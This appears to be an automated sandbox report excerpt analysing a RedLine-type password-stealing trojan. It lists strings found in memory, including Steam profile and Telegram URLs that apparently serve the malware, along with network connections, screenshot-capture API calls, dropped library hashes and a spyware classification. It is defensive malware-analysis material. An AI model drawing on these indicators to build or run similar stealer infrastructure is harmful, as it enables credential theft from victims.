Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://github.com/tmds/Tmds.DBus/issues/15.
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888g
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://system.data.sqlite.org/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://system.data.sqlite.org/X
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfail
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfailAt
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://urn.to/r/sds_see=isolation
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://www.sqlite.org/lang_corefunc.html
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49754 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411D10 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411D10

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6C81ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C85B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C85B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C85B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C7FF280

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6154D	0_2_00F6154D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F73080	0_2_00F73080
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F97261	0_2_00F97261
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6122F	0_2_00F6122F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F983DF	0_2_00F983DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6E388	0_2_00F6E388
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F694C8	0_2_00F694C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F977B2	0_2_00F977B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F998E8	0_2_00F998E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F97D03	0_2_00F97D03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F65F8F	0_2_00F65F8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6DF00	0_2_00F6DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D38A	3_2_0041D38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F4C0	3_2_0041F4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CE39	3_2_0041CE39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DFB7	3_2_0041DFB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F35A0	3_2_6C7F35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C806C80	3_2_6C806C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C836CF0	3_2_6C836CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86AC00	3_2_6C86AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C835C10	3_2_6C835C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C842C10	3_2_6C842C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C830DD0	3_2_6C830DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80FD00	3_2_6C80FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81ED10	3_2_6C81ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C815E90	3_2_6C815E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C854EA0	3_2_6C854EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80FEF0	3_2_6C80FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FBEF0	3_2_6C7FBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C837E10	3_2_6C837E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C859E30	3_2_6C859E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C842E4E	3_2_6C842E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C819E50	3_2_6C819E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C833E50	3_2_6C833E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C866E63	3_2_6C866E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C826FF0	3_2_6C826FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C809F00	3_2_6C809F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FDFE0	3_2_6C7FDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8358E0	3_2_6C8358E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C807810	3_2_6C807810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83B820	3_2_6C83B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C844820	3_2_6C844820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C818850	3_2_6C818850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81D850	3_2_6C81D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C852990	3_2_6C852990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82D9B0	3_2_6C82D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81A940	3_2_6C81A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FC9A0	3_2_6C7FC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80D960	3_2_6C80D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C84B970	3_2_6C84B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86BA90	3_2_6C86BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C824AA0	3_2_6C824AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80CAB0	3_2_6C80CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C862AB0	3_2_6C862AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C838AC0	3_2_6C838AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C811AF0	3_2_6C811AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C839A60	3_2_6C839A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8534A0	3_2_6C8534A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85C4A0	3_2_6C85C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8064C0	3_2_6C8064C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81D4D0	3_2_6C81D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FD4E0	3_2_6C7FD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86542B	3_2_6C86542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C805440	3_2_6C805440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86545C	3_2_6C86545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8585F0	3_2_6C8585F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C820512	3_2_6C820512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85E680	3_2_6C85E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FC670	3_2_6C7FC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8676E3	3_2_6C8676E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C845600	3_2_6C845600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C814640	3_2_6C814640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8477A0	3_2_6C8477A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C837710	3_2_6C837710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8260A0	3_2_6C8260A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8650C7	3_2_6C8650C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81C0E0	3_2_6C81C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83F070	3_2_6C83F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C835190	3_2_6C835190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86B170	3_2_6C86B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83E2F0	3_2_6C83E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F22A0	3_2_6C7F22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F5340	3_2_6C7F5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8653C8	3_2_6C8653C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83D320	3_2_6C83D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80C370	3_2_6C80C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FF380	3_2_6C7FF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C89ECC0	3_2_6C89ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8FECD0	3_2_6C8FECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C966C00	3_2_6C966C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C97AC30	3_2_6C97AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AAC60	3_2_6C8AAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C936D90	3_2_6C936D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8A4DB0	3_2_6C8A4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CA2CDC0	3_2_6CA2CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CA28D20	3_2_6CA28D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9CAD50	3_2_6C9CAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C96ED70	3_2_6C96ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C926E90	3_2_6C926E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AAEC0	3_2_6C8AAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C940EC0	3_2_6C940EC0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\CAFIJKFHIJ.exe 9BFE195AAEE63E17887A211D9C9D88F819E5B49B19FD6DEA1EC020DACBE8B34E
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: String function: 00F62440 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C82CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C8394D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402360 appears 286 times

PE file does not import any functions

Source: Soft123[1].exe.3.dr	Static PE information: No import functions for PE file found
Source: CAFIJKFHIJ.exe.3.dr	Static PE information: No import functions for PE file found

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@16/26@2/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C857030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

